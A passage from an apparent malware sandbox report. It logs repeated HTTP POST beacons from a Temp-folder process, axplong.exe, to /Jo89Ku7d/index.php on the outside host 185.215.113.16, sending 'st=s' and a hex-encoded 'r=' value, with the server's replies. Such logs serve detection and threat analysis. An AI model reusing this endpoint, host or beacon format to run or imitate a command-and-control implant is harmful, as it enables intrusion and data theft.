                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:13.704843998 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.462768185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:13.812005043 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:14.511718988 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:14.512782097 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:14.739614010 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.462769185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:14.858547926 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:15.617336988 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:15.618117094 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:15.846216917 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.462770185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:15.971127033 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:16.686966896 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:16.718168020 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:16.942694902 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.462771185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:17.070034027 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:17.791604996 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:17.792372942 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:18.222332001 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.462772185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:18.343193054 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:19.042541027 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:19.043361902 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:19.267927885 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.462773185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:19.376429081 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:20.093755007 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:20.102241039 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:20.335776091 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.462774185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:20.452722073 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:21.143999100 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:21.147187948 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:21.376091003 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.462775185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:21.483911037 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:22.193558931 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:22.194367886 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:22.421060085 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.462776185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:22.531008005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:23.255934954 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:23.256836891 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:23.485796928 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.462777185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:23.593913078 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:24.396785975 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:24.397521973 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:24.621591091 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.462778185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:24.734201908 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:25.629631996 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:25.630772114 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
